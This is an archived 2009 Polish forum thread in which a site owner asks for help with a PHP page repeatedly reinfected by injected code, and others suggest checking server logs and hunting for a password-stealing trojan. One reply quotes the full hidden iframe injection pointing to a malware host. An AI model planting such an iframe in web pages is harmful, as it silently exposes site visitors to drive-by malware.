Discussion:
powtarzaj�ce si� ataki na stron� www
(Wiadomość utworzona zbyt dawno temu. Odpowiedź niemożliwa.)
Peter
2009-07-19 18:06:21 UTC
Permalink
Witam wszystkich forumowiczów.

Poszukuję osób które miały ataki na strony www poprzez dopisanie po
<body> następującej linii:

......u0b.in:8080/ts/in.cgi?pepsi104" ......

Nie znalazłem w internecie informacji na podobny temat. Mój problem
polega na tym, że mimo zainstalowanych programów antywirusowych,
codziennego skanowania dysków ciągłej zmiany haseł pojawiają się ataki
co kilka dni. Korzystam z FileZilla i login oraz hasło wpisuje z
palca. po każdym ataku zmieniam zainfekowane pliki i hasło. Program
nod32 zgłasza mi ataki na komputer oraz poddaje pliki kwarantannie,
ale odnoszę wrażenie, że najpierw trojan "robi swoje" a potem jest
unieszkodliwiany. Może ktoś z Was spotkał się z takim problemem. Będę
wdzięczny za każdą podpowiedź.

Na dzień dzisiejszy musiałem sobie poradzić tak:

$mmm="<b";
$mmm.="o";
$mmm.="d";
$mmm.="y>";
echo $mmm;
$trick="<body>";


W wyniku ataku modyfikowana jest zmienna $trick. Jednak nie jest ona
drukowana więc kod wynikowy nie zawiera kodu wirusa.

Co można zrobić więcej ?

Pozdrawiam Piotr
Lemat
2009-07-19 20:11:13 UTC
Permalink
Post by Peter
Witam wszystkich forumowiczów.
Poszukuję osób które miały ataki na strony www poprzez dopisanie po
......u0b.in:8080/ts/in.cgi?pepsi104" ......
Nie znalazłem w internecie informacji na podobny temat. Mój problem
polega na tym, że mimo zainstalowanych programów antywirusowych,
codziennego skanowania dysków ciągłej zmiany haseł
na serwerze czy na komputerze domowym?
Post by Peter
Co można zrobić więcej ?
sprawdzić serwer - obejrzeć po prostu logi systemowe - niech ci to zrobi
jakaś kompetentna osoba.
--
Pozdrawiam
Lemat
Jan Strybyszewski
2009-07-20 09:48:00 UTC
Permalink
Post by Lemat
sprawdzić serwer - obejrzeć po prostu logi systemowe - niech ci to zrobi
jakaś kompetentna osoba.
Wyglada to na atak na wordpressa lub jakis inny blogowy silnik ..
dopisuje do plikow php taka linijke jak ta ponizej.


<iframe src="http://u0b.in:8080/ts/in.cgi?pepsi104" <iframe src =
"http://u0b.in:8080/ts/in.cgi?pepsi104"
width=125 height=125 style="visibility: hidden"></iframe> width = 125
height = 125 style = "visibility: hidden"> </ iframe>
Lemat
2009-07-20 11:10:53 UTC
Permalink
Post by Jan Strybyszewski
Post by Lemat
sprawdzić serwer - obejrzeć po prostu logi systemowe - niech ci to zrobi
jakaś kompetentna osoba.
Wyglada to na atak na wordpressa lub jakis inny blogowy silnik ..
dopisuje do plikow php taka linijke jak ta ponizej.
<iframe src="http://u0b.in:8080/ts/in.cgi?pepsi104" <iframe src =
"http://u0b.in:8080/ts/in.cgi?pepsi104"
width=125 height=125 style="visibility: hidden"></iframe> width = 125
height = 125 style = "visibility: hidden"> </ iframe>
Ja też wyglądam jakbym był piękny i bogaty a w rzeczywistości jestem
złośliwym gnomem...

Istotne są logi serwera ftp, ssh i www, Mniej istotne są logi crona. Jeżeli
autor wątku nie umie czytać logów to musi wynająć kogoś, kto to potrafi.
Jeżeli np. logi zostały skasowane to jest to już poważny problem na serwerze
i trzeba by go solidnie wyklepać młotkiem.
--
Pozdrawiam
Lemat
Peter
2009-07-21 13:57:04 UTC
Permalink
Post by Lemat
Istotne są logi serwera ftp, ssh i www, Mniej istotne są logi crona. Jeżeli
autor wątku nie umie czytać logów to musi wynająć kogoś, kto to potrafi.
Jeżeli np. logi zostały skasowane to jest to już poważny problem na serwerze
i trzeba by go solidnie wyklepać młotkiem.
--
Pozdrawiam
Lemat
Serwer w home.pl na serwerze tylko jedna strona w php. Z logów wynika,
że zalogowano się z mojego konta. Dlatego własnie skierowałem się w
kierunku trojanów których jednak nic nie wykrywa.

Piotr
Kamil Konieczny
2009-07-22 11:51:35 UTC
Permalink
Post by Peter
[...]
Serwer w home.pl na serwerze tylko jedna strona w php. Z logów wynika,
że zalogowano się z mojego konta. Dlatego własnie skierowałem się w
kierunku trojanów których jednak nic nie wykrywa.
czy z Twojego numeru ip ?

wykrycie nowego trojana to temat rzeka ...

zalezy od systemu operacyjnego (Linux, winXP, inny ?)
dostepnych narzedzi i stosowanych procedur
(umozliwiajacych wykrycie zmian w systemie niestety zwykle po fakcie)

pozdrawiam,
Kamil Konieczny

£ukasz Czerpak
2009-07-20 10:57:39 UTC
Permalink
Post by Peter
Witam wszystkich forumowiczów.
Poszukuję osób które miały ataki na strony www poprzez dopisanie po
......u0b.in:8080/ts/in.cgi?pepsi104" ......
Nie znalazłem w internecie informacji na podobny temat. Mój problem
polega na tym, że mimo zainstalowanych programów antywirusowych,
codziennego skanowania dysków ciągłej zmiany haseł pojawiają się ataki
co kilka dni. Korzystam z FileZilla i login oraz hasło wpisuje z
palca. po każdym ataku zmieniam zainfekowane pliki i hasło. Program
nod32 zgłasza mi ataki na komputer oraz poddaje pliki kwarantannie,
ale odnoszę wrażenie, że najpierw trojan "robi swoje" a potem jest
unieszkodliwiany. Może ktoś z Was spotkał się z takim problemem. Będę
wdzięczny za każdą podpowiedź.
Kiedyś znajomy notorycznie miał problemy ze stronami, do których
"doklejały się" kody javascript przekierowujące na inne strony ze
złośliwym kodem. Modyfikacja dokonywana była przez FTP na serwerze -
różne ip rozlokowane geograficznie zupełnie losowo.
Okazało się, że znajomy miał jakiegoś trojana na swoim kompie, który
wykradał hasła. Po wyleczeniu komputera wszystko wróciło do normy.
--
pozdrawiam,
lukes
Kontynuuj czytanie narkive:
Loading...